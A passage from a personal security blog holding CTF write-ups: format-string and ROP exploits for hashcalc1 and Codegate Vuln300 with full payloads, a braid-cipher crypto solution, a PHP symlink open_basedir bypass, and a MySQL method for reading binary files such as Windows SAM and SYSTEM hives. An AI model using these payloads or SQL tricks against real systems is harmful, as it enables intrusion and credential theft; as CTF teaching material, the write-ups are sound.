08048994 <send@plt>:

Normally, to calling the libc functions without brute forcing when ASLR is enabled, we need to use the resolved function in GOT entry then add it with the offset. With send(), we can make program send the whole GOT section to us. Then we can modified any GOT entries and send the modified table back with recv().

First, I planned to modified GOT entries to have mprotect() and other functions to be able to put the shell code. But I remembered that reverse shell is just connect back with new socket, then dup2() and execve("/bin/sh"). We do not need to use shell code. Just call dup2() and execve("/bin/sh"). And of course we can use some area of GOT section to put "/bin/sh" string.

Now, coding time. First the format string bug, I need to move the esp to the controlled stack area. I found this gadget

0x8049106L: add esp 0x54 ; pop ebx ; pop esi ; pop ebp ;;

Format string to overwrite the strlen GOT entry is

got_strlen_addr = 0x0804a41c
payload_fmt = pack("<I", got_strlen_addr) + pack("<I", got_strlen_addr+2) + "%"+str(0x804-8)+"x%6$hn" + "%"+str(0x9106-0x804)+"x%5$hn"

Then, do send() and recv()

# 0x8048c1aL: add esp 0xc ; pop ebx ; pop ebp ;;
# send GOT table to me
payload += pack("<I", plt_send_addr) + pack("<I", 0x8048c1a) + pack("<I", sock_fd) + pack("<I", got_plt_section) + pack("<I", got_plt_section_size) + pack("<I", 0) + "JUNK"
# recv GOT table from me
payload += pack("<I", plt_recv_addr) + pack("<I", 0x8048c1a) + pack("<I", sock_fd) + pack("<I", got_plt_section) + pack("<I", got_plt_section_size) + pack("<I", 0) + "JUNK"

Then, do dup2() and execve() with similar method. I do not show here.

Another important part is finding function offset in libc. I used Ubuntu but when looking in the binary with objdump

$ objdump -s -j .comment hashcalc1

hashcalc1:     file format elf32-i386

Contents of section .comment:
 0000 4743433a 20284465 6269616e 20342e34  GCC: (Debian 4.4
 0010 2e352d38 2920342e 342e3500 4743433a  .5-8) 4.4.5.GCC:
 0020 20284465 6269616e 20342e34 2e352d31   (Debian 4.4.5-1
 0030 30292034 2e342e35 00                 0) 4.4.5.

The binary is compiled on Debian 6. So I tried to overwrite the functions that near dup2() and execve() and hope the offset are same. Even the offset is different, I still can do little brute forcing to get the offset (can send some data back if offset is correct). But it's no need for this challenge because the server that ran this binary is same as we could login to do local pwnable challenges.

$ objdump -T libc.so.6 | grep -w -e setreuid -e dup2
000c4b50  w   DF .text  00000076  GLIBC_2.0   setreuid
000bd760  w   DF .text  0000003d  GLIBC_2.0   dup2
$ objdump -T libc.so.6 | grep -w -e fork -e execve
00097550  w   DF .text  000002b0  GLIBC_2.0   fork
00097870  w   DF .text  00000053  GLIBC_2.0   execve

Here is my exploit hashcalc1.py

$ python hashcalc1.py
** Welcome to the online hash calculator **
$
payload len: 164
got GOT table: 156
uid=1009(hashcalc1) gid=1010(hashcalc1) groups=1010(hashcalc1),0(root)

th3_0tH3r_DJB

Key: th3_0tH3r_DJB

Sunday, April 17, 2011

PHP symlink() and open_basedir

I was asked by someone about the exploit from http://securityreason.com/achievement_exploitalert/14. Why they could not delete the created symbolic links?

The exploit explanation is in http://securityreason.com/achievement_securityalert/70 (if you have a problem to access it, here is the backup http://seclists.org/fulldisclosure/2009/Nov/165).

This exploit just creates a symbolic link to a file outside the open_basedir with a neat trick, then using web server to access it (not invoking PHP interpreter). In my opinion, this is not PHP vulnerability. This is a feature (you still can do it with latest PHP). If we try to access the symbolic link with PHP functions (such as readfile(), file_get_contents()), we will get the error message related to open_basedir. Also we cannot delete/modify the symbolic links with unlink() PHP functions because of open_basedir restriction (answer the above question).

I think the easier way to abuse this feature is creating the symbolic link to root directory. No exploit from me. It's so easy to write :).

The workaround for this problem is adding symlink() using "disable_functions" feature to disable function or disabling following symbolic link in web server (FollowSymLinks in apache).

Update: I overlooked the method to delete the symbolic link. We just need to do the reverse by removing directory and recreating the tmplink. Here is the PHP code to delete the symbolic link that is created with kakao.php from the advisory.

<?php
rmdir("tmplink");
symlink("abc/abc/abc/abc","tmplink");
unlink("exploit");
unlink("tmplink");

Update:If you install Suhosin patch, you are safe from this problem by default. See http://www.hardened-php.net/suhosin/configuration.html#suhosin.executor.allow_symlink for more information.

Monday, April 4, 2011

Nuit du Hack CTF 2011 Crypto 300 Writeup

Challenge : http://repo.shell-storm.org/CTF/NDH2K11-prequals/CRYPTO/CRYPTO300/crypto300.zip

The challenge gives me the python code. The code is some kind of key exchange algorithm (I do not know). There are 3 important methods in Braid class.

class Braid:
    # ...
    def reverse(self):
        rev = [self.items.index(i) for i in range(self.size)]
        return Braid(rev)
       
    def combine(self, _braid):
        if len(_braid) != self.size:
            raise "Invalid size"
        return Braid([_braid[self.items[i]] for i in range(self.size)])

    def shuffle(self,offset=0,size=0):
        for j in range(randint(1024,4096)):
            if size==0: # client
                for i in range(offset,self.size): # range(11, 22)
                    idx1 = randint(offset,self.size-1) # randint(11, 21)
                    self.swap(i,idx1)
            else:  # server
                for i in range(offset,size): # range(0, 11)
                    idx1 = randint(0,size-1) # randint(0, 10)
                    self.swap(i,idx1)

The public key and private key are generated from BraidKey class

class BraidKey:
    def __init__(self, K, client):
        self.K = K
        N = len(K)
        self.privkey = Braid(N)
        if client:
            self.privkey.shuffle(offset=N/2)
        else:
            self.privkey.shuffle(size=N/2)
        self.privrkey = self.privkey.reverse()
        self.pubkey = self.privkey.combine(self.K.combine(self.privrkey))

From code, the client privkey is initialized with [0..21], then shuffled only last 11 elements and first 11 elements are fixed. So the client privkey always be [0..10, random shuffled]. The client privrkey is derived from privkey with so strange reverse function. With the client privkey generation, the client privkey always be [0..10, derived from privkey].

When looking in "server.py", I found

raw_K = '0D1214040108060F050C0E0207030A151009000B1311'
self.s = ServerSocket(peer,allowed_pubkeys=['0F0C11040108060B05150E1000090A030D1312140207'])

So the server accepts only public key '0F0C11040108060B05150E1000090A030D1312140207'. From pubkey generation algorithm (the last line in BraidKey::__init__), We know pubkey, half of privkey, K, and half of privrkey. Also the combine() function is reversible. So I think it's possible to find the privkey from pubkey.

It's difficult to explain. Just see the code findpriv.py (I know you guys will understand :P).

K = str2ary(hex2str("0D1214040108060F050C0E0207030A151009000B1311"))
pubkey = str2ary(hex2str("0F0C11040108060B05150E1000090A030D1312140207"))

priv =  [ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 ]
privr = [ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 ]
inter = [ -1 ]*22  # inter is self.K.combine(self.privrkey)
for i in range(11):
    inter[i] = pubkey[i]

# pubkey = priv.combine(K.combine(privr))
# for i in [0,11)  =>  priv[i] = i; pubkey[i] = inter[priv[i]] = inter[i] = privr[K[i]]
for i in range(11):
    privr[K[i]] = pubkey[i]

# inter = K.combine(privr); inter[i] = privr[K[i]]
for i in range(11, 22):
    inter[i] = privr[K[i]]

# pubkey = priv.combine(K); pubkey[i] = K[priv[i]]
for i in range(11, 22):
    if pubkey[i] in inter:
        priv[i] = inter.index(pubkey[i])
    
# privr = priv.reverse()
for i in range(11, 22):
    if i in priv:
        privr[i] = priv.index(i)
for i in range(11, 22):
    if privr[1] != -1:
        priv[privr[i]] = i

# inter = K.combine(privr); inter[i] = privr[K[i]]
for i in range(11, 22):
    inter[i] = privr[K[i]]

# pubkey = priv.combine(K); pubkey[i] = K[priv[i]]
for i in range(11, 22):
    if pubkey[i] in inter:
        priv[i] = inter.index(pubkey[i])

if priv.count(-1) == 1:
    pos = priv.index(-1)
    for i in range(22):
        if i not in priv:
            priv[pos] = i
            break

print priv
$ python findpriv.py
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 18, 17, 14, 13, 21, 20, 16, 19, 11, 12]

Then I changed the self.privkey.shuffle(offset=N/2) line in BraidKey class to self.privkey = [above privkey].

$ python client.py
[Crypto300 sample client]
[i] Welcome on Goofyleaks. Can I haz ur public kay ?
[+] Your leaked flag: Br4iDCrypto_i5_b3au7ifu11

Answer: Br4iDCrypto_i5_b3au7ifu11

Monday, March 7, 2011

Codegate CTF 2011 Vuln300 Writeup

This challenge, we were given the ssh account to Ubuntu 10.10. We have to exploit the binary inside /home/vuln1 to get the vuln1 privilege and grab the flag. ASLR and NX are enabled. The binary was compiled without stack cookie, PIE.

After reading the assembly in IDA, I wrote the code in C (vuln300.c). Below is the important parts.

char gbuffer[512];  // 0x0804a0a0
int authenticated;

int authen(char *username, char *password)
{
    snprintf(gbuffer, 513, "%s:%s", username, password);
    if (!authenticated)
        authenticated = (strncmp(gbuffer, "s0m3b0dy:15n0b0dy", 17) == 0);

    return authenticated;
}

void add_user(newusername, newpassword, filename)
{
    char buffer[512];
    char user_len, pass_len;

    user_len = (char) strlen(newusername);
    strncpy(buffer, newusername, 511);
    pass_len = (char) strlen(newpassword);
    strncat(buffer, newpassword , 512);

    fprintf(stdout, "New user %s added to %s!\n", newusername, filename);
}

Problem in authen() function

The authen() function use strncmp() for compare the string. So we can authenticate with username that starts with "s0m3b0dy:15n0b0dy". Additional, gbuffer address is static (0x0804a0a0) because binary is not PIE. We can use gbuffer to put the payload here to create a reliable exploit.

Problem in add_user() function

It is obvious that there is buffer overflow problem in this function. We can overwrite saved ebp and saved eip. But we should not write past the saved eip because fprintf might be crashed if the newusername address is invalid.


With above 2 problems (plus GOT is writable), I came up with these steps.

  1. Overwrite saved ebp for moving the esp to gbuffer area with "leave; ret"
  2. Put the ROP stack in gbuffer to add the address in GOT entry to point to execve() function
  3. Call the execve()

To achieve the step 2, I used ROPEME to find the gadgets. Because we want only add the value in a static address (GOT entry), here is the interested gadgets

0x8048559L: add eax 0x804a064 ; add [ebx+0x5d5b04c4] eax ;;
0x8048418L: pop eax ; pop ebx ; leave ;;

The second gadget is for setting eax and ebx. Then we can use the first gadget to change the value of GOT entry. I modified the sleep() entry at address (0x804a01c).

$ objdump -T libc.so.6 | grep -w sleep
00098e50  w   DF .text  00000299  GLIBC_2.0   sleep
$ objdump -T libc.so.6 | grep -w execve
00099510  w   DF .text  0000005a  GLIBC_2.0   execve

Some needed computation
- The offset from sleep() to execve() in libc is 0x00099510 - 0x00098e50 = 0x6c0
- The eax before calling first gadget should be 0x1000006c0 - 0x0804a064 = 0xf7fb665c
- The ebx before calling first gadget should be 0x10804a01c - 0x5d5b04c4 = 0xaaa99b58

Here is my exploit that will call execve("0dy", 0, 0) (I used "0dy" string from "s0m3b0dy:15n0b0dy" at address 0x08048a24)

$ /home/vuln1/vuln300 -us0m3b0dy:15n0b0dyAA `perl -e 'print "-p","\xc4\xa0\x04\x08","\x18\x84\x04\x08","\x5c\x66\xfb\xf7","\x58\x9b\xa9\xaa","\xc4\xa0\x04\x08","\x59\x85\x04\x08","\xd5\x88\x04\x08","\x24\x8a\x04\x08"'` -fa `perl -e 'print "-x","A"x510'` `perl -e 'print "-yAAAA","\xb4\xa0\x04\x08","\x1a\x84\x04\x08"'`
...
$ cat flag.txt
33f9876804c9a14e927e5d1d70a64ace

Wednesday, January 19, 2011

Get binary file via MySQL

Just a note for getting binary file via MySQL because I just had to do it. But I cannot find a method on the internet (with google).

If a binary file is small, the easy way is using LOAD_FILE(). For example,

SELECT HEX(LOAD_FILE('c:/windows/repair/sam'));

But if a binary file is big, MySQL throws a warning "Result of load_file() was larger than max_allowed_packet (1048576) - truncated" then returns NULL to me.

Someone on MySQL forum said using "SET SESSION max_allowed_packet=16*1024*1024;" before using LOAD_FILE(). But it does not work for me. :(

After read the MySQL doc, I found a method to do it with "LOAD DATA INFILE". This command definitely needs a table to keep the data. Here is my SQL commands to load binary file into table.

use test;
CREATE TABLE files (bin_data longblob);
LOAD DATA INFILE 'c:/windows/repair/system' INTO TABLE files FIELDS TERMINATED BY 'AAAAAAAAAAA' ESCAPED BY '' LINES TERMINATED BY 'BBBBBBBBBBBBBBBB';

After these commands, the binary data will be in the "files" table without modification. :)

Note about "FIELDS TERMINATED BY" and "LINES TERMINATED BY" values. They can be any string patterns that do not exist in the binary file.